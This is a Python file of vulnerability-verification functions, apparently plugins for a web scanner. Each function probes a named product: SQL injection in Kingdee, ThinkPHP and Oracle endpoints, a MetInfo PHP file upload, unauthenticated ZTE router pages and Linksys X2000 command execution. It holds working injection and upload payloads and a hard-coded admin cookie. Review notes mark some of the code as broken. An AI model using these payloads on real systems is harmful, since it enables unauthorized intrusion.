    """Boolean-based SQL injection check on the ``nowlx`` query parameter.

    For each entry ``matchurl`` yields for the target, requests
    ``nowlx=m' or '1'='1`` and ``nowlx=m' or '1'='2`` against ``self.target``
    and reports when both answer 200, the first body contains
    ``class="gray"`` and the second does not. Exceptions are logged and swallowed.
    Reference: wooyun-2010-0107187.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # refer:http://www.wooyun.org/bugs/wooyun-0107187
        hh = hackhttp.hackhttp()
        candidates = matchurl(self.target)
        # NOTE(review): the loop variable is never used; every iteration
        # issues the same two requests against self.target. Kept as in the
        # original — confirm whether `candidate` was meant to be the base URL.
        for candidate in candidates:
            url_true = self.target + '?nowlx=m%27%20or%20%271%27=%271'
            url_false = self.target + '?nowlx=m%27%20or%20%271%27=%272'
            status_true, _h1, page_true, _e1, _ = hh.http(url_true)
            status_false, _h2, page_false, _e2, _ = hh.http(url_false)
            gray_true = re.search('class="gray"', page_true)
            gray_false = re.search('class="gray"', page_false)
            both_ok = status_true == 200 and status_false == 200
            if both_ok and gray_true and gray_false is None:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))
def verify(self):
    """Arbitrary file upload check for MetInfo ``feedback/uploadfile_save.php``.

    Writes to the target: sends a raw multipart request that uploads a small
    PHP file (it prints the md5 of ``1``), then brute-forces the stored name as
    ``<upload-time + i>.php`` for i in 100..9999 under ``/upload/file/`` and
    reports the first 200 whose body contains that digest. The uploaded file is
    never removed. Exceptions are logged and swallowed.
    """
    self.target = self.target.rstrip(
        '/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        hh = hackhttp.hackhttp()
        url = self.target + \
            "/feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo"
        # NOTE(review): as stored, the line breaks inside this raw request
        # have been collapsed to single spaces, so it is not a well-formed
        # HTTP message; the original presumably had CRLF-separated lines —
        # confirm against the repository. Also note the fixed Host header
        # ('localhost') and the hard-coded Content-Length.
        raw = ''' POST /feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo HTTP/1.1 Host: localhost Content-Length: 423 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: null Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE1toBNeESf6p0uXQ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: PHPSESSID=hfqa37uap92gdaoc2nsco6g0n1 ------WebKitFormBoundaryE1toBNeESf6p0uXQ Content-Disposition: form-data; name="fd_para[1][para]" filea ------WebKitFormBoundaryE1toBNeESf6p0uXQ Content-Disposition: form-data; name="fd_para[1][type]" 5 ------WebKitFormBoundaryE1toBNeESf6p0uXQ Content-Disposition: form-data; name="filea"; filename="test.php" Content-Type: application/x-php <?php echo md5(1); ?> ------WebKitFormBoundaryE1toBNeESf6p0uXQ-- '''
        # proxy=('127.0.0.1',8080)
        code, head, res, errcode, finalurl = hh.http(url, raw=raw)  # upload file
        # get upload file name: the server presumably names the file from the
        # upload timestamp plus a counter, hence the scan over name + i.
        # NOTE(review): up to 9900 GETs per target; there is no early exit on
        # non-200 codes other than the success branch.
        name = int(time.time())
        for i in range(100, 10000):
            filename = name + i
            url = self.target + '/upload/file/%s.php' % (str(filename))
            # print url
            code, head, res, errcode, finalurl = hh.http(url)
            if code == 200 and "c4ca4238a0b923820dcc509a6f75849b" in res:
                # security_hole('file upload Vulnerable:'+arg+"feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo")
                self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                    target=self.target, name=self.vuln.name))
                break
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self):
    """Unauthenticated page access check for ZTE ``*.gch`` management pages.

    Requests four management pages and reports the target for each one whose
    body contains the page-specific marker (e.g. ``PreSharedKey`` on
    ``wlan_security.gch``). Status codes are not inspected. Exceptions are
    logged and swallowed. Reference: wooyun-2010-066850.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # Referer : http://www.wooyun.org/bugs/wooyun-2010-066850
        hh = hackhttp.hackhttp()
        # (page path, string expected only when the page renders unauthenticated)
        page_markers = [
            ('/status_dev_info_t.gch', 'Frm_CarrierName'),
            ('/manager_dev_config_t.gch', 'ConfigUpload'),
            ('/wlan_security.gch', 'PreSharedKey'),
            ('/manager_log_conf_t.gch', 'Transfer_meaning'),
        ]
        for page_path, marker in page_markers:
            _status, _head, page, _err, _ = hh.http(self.target + page_path)
            if marker in page:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))
def verify(self):
    """Time-based blind SQL injection check for five Kingdee JSP endpoints.

    Each payload embeds ``WAITFOR DELAY '0:0:0'``; a second URL is derived
    by rewriting the delay to ``0:0:5``. Both are timed and the target is
    reported when both returned a non-zero status and the delayed request
    took more than 3 s longer than the zero-delay one.
    Exceptions are logged and swallowed.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        hh = hackhttp.hackhttp()
        zero_delay_paths = [
            "/kingdee/Template/TemplateEdit.jsp?RecordID=1'%20WAITFOR%20DELAY%20'0:0:0'--%20",
            "/kingdee/Template/TemplateSave.jsp?FileName=1'%20WAITFOR%20DELAY%20'0:0:0'--%20",
            "/kingdee/DocumentEdit.jsp?RecordID=1'%20WAITFOR%20DELAY%20'0:0:0'--%20&UserName=1",
            "/kingdee/DocumentSave.jsp?RecordID=1'%20WAITFOR%20DELAY%20'0:0:0'--%20&Template=1&Subject=1&Author=1&FileDate=1&FileType=1&HTMLPath=1",
            "/kingdee/DocumentShow.jsp?Template=1'%20WAITFOR%20DELAY%20'0:0:0'--%20&UserName=1",
        ]
        for zero_path in zero_delay_paths:
            url_zero = self.target + zero_path
            url_five = self.target + zero_path.replace("0:0:0", "0:0:5")
            mark_a = time.time()
            status_zero, _h1, _r1, _e1, _f1 = hh.http(url_zero)
            mark_b = time.time()
            status_five, _h2, _r2, _e2, _f2 = hh.http(url_five)
            mark_c = time.time()
            # (mark_c - mark_b) is the delayed request, (mark_b - mark_a) the
            # zero-delay one; the same expression shape as the original is kept.
            extra_delay = mark_c - mark_b - mark_b + mark_a
            if status_zero != 0 and status_five != 0 and extra_delay > 3:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))
def verify(self):
    """Boolean-based SQL injection check for a Hi-Target VNet6 GNSS receiver.

    Product note (from the original): a GNSS reference-station receiver used
    for landslide, tailings-dam, reservoir-dam, bridge, subsidence and
    building monitoring, precision agriculture and precise positioning; the
    original PoC title is "Hi-Target VNet6 reference station receiver SQL
    injection" and mentions the default account ``zhdgps/zhdgps``.

    Requests ``pid=200 and 1011-1010=1`` and ``pid=200 and 1011-1010=2`` and
    reports when the first answers 200 and its body is not a substring of the
    second body. Exceptions are logged and swallowed.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # Original author's remark: "almost every one has this flaw??????"
        hh = hackhttp.hackhttp()
        root = self.target
        # The arithmetic 1011-1010 evaluates to 1, so the first condition is
        # true and the second false on a backend that evaluates it.
        url_true = root + '/index.php?lang=en&pid=200%20and%201011-1010=1'
        url_false = root + '/index.php?lang=en&pid=200%20and%201011-1010=2'
        status_true, _h1, page_true, _e1, _ = hh.http(url_true)
        _status_false, _h2, page_false, _e2, _ = hh.http(url_false)
        # NOTE: whole-body substring test, not an equality test, as in the original.
        if status_true == 200 and page_true not in page_false:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))
def verify(self):
    """Error-based SQL injection check for ThinkPHP-style ``index.php?s=`` routes.

    Appends ``%27`` to the id of several ``/home/...`` actions and reports the
    target for every response containing the MySQL syntax-error text
    ``1064 You have``. Exceptions are logged and swallowed.

    NOTE(review): the ``payloads`` list has no commas between its string
    literals, so Python concatenates them into ONE string and the loop runs
    exactly once with a single malformed URL; the nine routes are never probed
    individually.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        hh = hackhttp.hackhttp()
        # See the docstring: adjacent literals collapse into a single element.
        payloads = [
            '/index.php?s=/home/shopcart/getPricetotal/tag/1%27'
            '/index.php?s=/home/shopcart/getpriceNum/id/1%27'
            '/index.php?s=/home/user/cut/id/1%27'
            '/index.php?s=/home/service/index/id/1%27'
            '/index.php?s=/home/pay/chongzhi/orderid/1%27'
            '/index.php?s=/home/pay/index/orderid/1%27'
            '/index.php?s=/home/order/complete/id/1%27'
            '/index.php?s=/home/order/detail/id/1%27'
            '/index.php?s=/home/order/cancel/id/1%27'
        ]
        for payload in payloads:
            verify_url = self.target + payload
            code, head, res, errcode, _ = hh.http(verify_url)
            # Status code is not checked; only the error text in the body.
            if '1064 You have' in res:
                # security_hole("infomation leak:"+poc)
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self):
    """Unauthenticated command execution check for a Linksys X2000 ``apply.cgi``.

    Executes a command on the target: the diagnostics ping form is posted with
    ``ping_ip=ls`` and a hard-coded admin cookie. The target is reported when
    the body contains ``X2000`` and the
    ``You must input an IP Address or Domain Name`` message. Exceptions are
    logged and swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        hh = hackhttp.hackhttp()
        data = 'submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_size=32&ping_times=5&ping_ip=ls'
        url = self.target + '/apply.cgi'
        # NOTE(review): `Cookie=` is passed as an arbitrary keyword to
        # hackhttp.http(); other blocks in this file use `cookie=` (lower
        # case) — confirm which spelling hackhttp actually honours.
        code, head, res, errcode, _ = hh.http(
            url,
            data,
            Cookie=
            'wys_userid=admin,wys_passwd=5982861B34B74E9A6DAD66A9895CDFFF')
        # Status code is not checked; only the two body markers.
        if 'X2000' in res and 'You must input an IP Address or Domain Name' in res:
            # security_hole('Linksys X2000 Command Execution AND Unauthorized access!')
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self):
    """Cookie-based error SQL injection check for ``/include/authrp.php``.

    Sends a ``reachstone_uid`` cookie carrying
    ``extractvalue(0x1, concat(0x23, md5(1)))`` and reports the target when
    the response is 200 and contains the leading digits of md5('1').
    Exceptions are logged and swallowed. Reference: wooyun-2014-058987.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # refer: http://www.wooyun.org/bugs/wooyun-2014-058987
        hh = hackhttp.hackhttp()
        # Short prefix of md5('1'); the XPath error may truncate the value.
        digest_prefix = 'c4ca4238a'
        # Injection point is the cookie, not a query parameter.
        probe_cookie = 'reachstone_uid=1 and extractvalue(0x1,concat(0x23,md5(1)))'
        probe_url = self.target + '/include/authrp.php'
        status, _head, page, _err, _ = hh.http(probe_url, cookie=probe_cookie)
        if status == 200 and digest_prefix in page:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))
def verify(self):
    """Boolean-based SQL injection check for ``coltop_interface.jsp?i_id``.

    Walks ``i_id`` 1..9 looking for a record that renders (200 and no
    "no data" text); for that record it appends ``and 1=1`` / ``and 1=2`` and
    reports when the ``1=1`` page matches the plain page (status and body)
    while the ``1=2`` page differs. Stops after the first report.
    Exceptions are logged and swallowed.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        hh = hackhttp.hackhttp()
        root = self.target
        for item_id in range(1, 10):
            plain_url = root + '/vc/vc/interface/styletop/coltop_interface.jsp?i_id=%s' % item_id
            plain_status, _head, plain_page, _err, _ = hh.http(plain_url)
            # '没有数据' is the application's "no data" message.
            if plain_status != 200 or '没有数据' in plain_page:
                continue
            true_status, _h1, true_page, _e1, _f1 = hh.http(plain_url + '%20and%201=1')
            _false_status, _h2, false_page, _e2, _f2 = hh.http(plain_url + '%20and%201=2')
            unchanged_on_true = plain_status == true_status and plain_page == true_page
            if unchanged_on_true and true_page != false_page:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(
                        target=self.target, name=self.vuln.name))
                break
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))
def verify(self):
    """Error-based (Oracle) SQL injection check for an ``.APPPROCESS`` endpoint.

    POSTs two form bodies that inject ``utl_inaddr.get_host_address('hen'||'tai')``
    into ``CourseModeID`` and ``YearTermNO`` respectively; a vulnerable backend
    echoes the concatenated string ``hentai`` in its resolution error. Reports
    for every 200 response containing it. Exceptions are logged and swallowed.
    Reference: wooyun-2010-065322.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        hh = hackhttp.hackhttp()
        # __Refer___ = http://www.wooyun.org/bugs/wooyun-2010-065322
        endpoint = self.target + '/ACTIONQUERYELECTIVERESULTBYTEACHSECRETARY.APPPROCESS?mode=2'
        form_bodies = (
            "bt_DYXZ=%b4%f2%d3%a1%d1%a1%d6%d0&bt_FXXD=%b7%b4%cf%f2%d1%a1%b6%a8&bt_QBCX=%c8%ab%b2%bf%b3%b7%cf%fa&bt_QBXZ=%c8%ab%b2%bf%d1%a1%d6%d0&CourseModeID=1)%20and%201=utl_inaddr.get_host_address('hen'||'tai')%20and%20(1=1&ReportTitle=%b9%fe%b6%fb%b1%f5%c9%cc%d2%b5%b4%f3%d1%a72014-2015%d1%a7%c4%ea%b5%da%b6%fe%d1%a7%c6%da%c9%cf%bf%ce%d1%a7%c9%fa%c3%fb%b5%a5&ScheduleSwitch=0&TeacherNO=130112&YearTermNO=16",
            "bt_DYXZ=%b4%f2%d3%a1%d1%a1%d6%d0&bt_FXXD=%b7%b4%cf%f2%d1%a1%b6%a8&bt_QBCX=%c8%ab%b2%bf%b3%b7%cf%fa&bt_QBXZ=%c8%ab%b2%bf%d1%a1%d6%d0&CourseModeID=1&ReportTitle=%b9%fe%b6%fb%b1%f5%c9%cc%d2%b5%b4%f3%d1%a72014-2015%d1%a7%c4%ea%b5%da%b6%fe%d1%a7%c6%da%c9%cf%bf%ce%d1%a7%c9%fa%c3%fb%b5%a5&ScheduleSwitch=0&TeacherNO=1&YearTermNO=1%20and%201=utl_inaddr.get_host_address('hen'||'tai')",
        )
        for form_body in form_bodies:
            status, _head, page, _err, _final = hh.http(endpoint, post=form_body)
            if status == 200 and 'hentai' in page:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))